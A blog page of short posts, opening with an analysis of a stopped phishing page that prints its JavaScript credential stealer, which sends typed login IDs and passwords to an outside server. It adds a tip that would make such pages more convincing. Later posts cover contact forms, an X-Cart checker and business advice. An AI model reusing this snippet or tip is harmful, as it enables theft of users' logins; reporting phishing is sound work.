Nifty Phishing Approach

*** Scam was stopped ***

This phishing attempt was delivered through email, with the above link - claiming maintenance was scheduled. Has some nice text, doesn’t tell you to login, but provides a link so you can. :)

It looks great.

The code below is the phishing code, it catches the login validation and sends it to the sys82.net server, where it can capture your data.


var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'http://sys82.net/index.php?loh=1&login=' + document.getElementById('loginid').value + '&password=' + document.getElementById('password').value;
document.body.appendChild(script);
return false;

The page content is probably copied live from the real site, with the javascript added in by the phishermen.

Page is slow. Would be good to take a screenshot and use that as a background while the real page loads. :yes:

Anonymous Contact Forms

There are times when an anonymous report is appropriate. It is usually when you are reporting something and don’t need to be involved further.

In that case, completing a contact form with bogus information and an email address at anonymous.com or example.com should pass validation to deliver the message.

I don’t think email validation should discard anonymous reports, unless they are attempts to spam.

http://anonymous.com/
http://www.example.com/

Free X-Cart Installation Checker

The checker is an HTML file that will allow you to enter the URL for your cart, the directory you have installed it in, then offer you links that you can click to see if the server has been properly configured to protect the files.

This tool is valuable for the following:

  • Engineering, security, and QA - to ensure the application was properly installed and protected
  • eCommerce site owners - to check the work of your web development company
  • Credit card gateway companies - to check the security of the application installed for requesting clients
  • Security - to identify risk areas for applications
  • Hosting companites - to check client accounts after security problems

You do not have to install it on a server, you can run it from the desktop. It does not require any server access beyond the browser. No passwords, no database access, no FTP, no SSH. It doesn’t use AJAX, it won’t log into your cart. It won’t analyze the results.

It is a very simple, free tool that runs under IE.

If you would like a copy, you must either have a live cart running, or be part of a web development company. Use an email with the domain name of the cart, or your web dev company, and I will send you the HTML - in a text file. Requests can be made through the contact form on this blog.

Please don’t use gmail, hotmail, yahoo or other free accounts. You will not receive any response.

The reason the page isn’t posted for public access it that it would make it very easy for people to quickly check a cart’s vulnerabilities. Limiting the distribution is for security. This is not an attempt to collect email addresses or domains that are running X-Cart. I know how to find carts. :)

Work isn't necessarily Profit

Never forget that even if you are working hard, if it costs more to deliver the goods or services than you receive, you are still losing money.

If you don’t know what it costs, you are probably losing money.

If you don’t know how much you have been paid, you are probably losing money.

If you don’t know the basic operating costs and overhead for your company, you are probably losing money.

Partnerships

  • A partnership doesn’t imply direct revenue generation or sales support
  • A partnership should help all parties reach their goals
  • A partnership should raise the level of service for the end user
  • A partnership should be respected by all parties
  • Partnership participation costs should be clearly defined and understood by all parties
  • Levels of participation should be allowed, and partners should be able to ‘opt-out’ of opportunities